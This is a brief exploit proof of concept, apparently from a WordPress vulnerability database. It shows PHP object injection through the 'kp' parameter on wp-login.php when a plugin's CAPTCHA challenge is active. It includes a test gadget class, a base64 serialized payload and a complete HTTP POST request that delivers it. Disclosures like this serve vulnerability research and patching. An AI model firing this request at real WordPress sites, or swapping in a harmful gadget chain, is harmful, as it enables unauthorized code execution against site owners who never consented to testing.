## https://sploitus.com/exploit?id=WPEX-ID:E8BB79DB-EF77-43BE-B449-4C4B5310EEDF
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
On a page where the request is blocked and the second challenge is set to a CAPTCHA (such as reCAPTCHA), send dummy data, intercept it and change the kp parameter with the following payload: Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:"Evil":0:{};)
POST /wp-login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
Connection: close
Upgrade-Insecure-Requests: 1
kn=6dc52e6b54&ss_block=G&kp=Tzo0OiJFdmlsIjowOnt9Ow%3D%3D&kr=Allow+List+Email%3A+block%40email.com&ka=block%40email.com&ke=cwenf&km=cc&recaptcha=recaptcha&g-recaptcha-response=